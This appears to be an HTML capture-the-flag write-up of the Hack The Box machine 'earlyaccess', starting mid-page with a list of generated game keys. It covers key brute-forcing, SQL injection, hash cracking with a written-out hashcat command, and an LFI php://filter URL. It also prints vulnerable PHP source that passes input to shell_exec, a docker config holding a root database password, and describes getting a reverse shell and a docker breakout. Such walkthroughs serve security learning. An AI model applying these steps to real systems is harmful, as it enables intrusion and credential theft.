                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
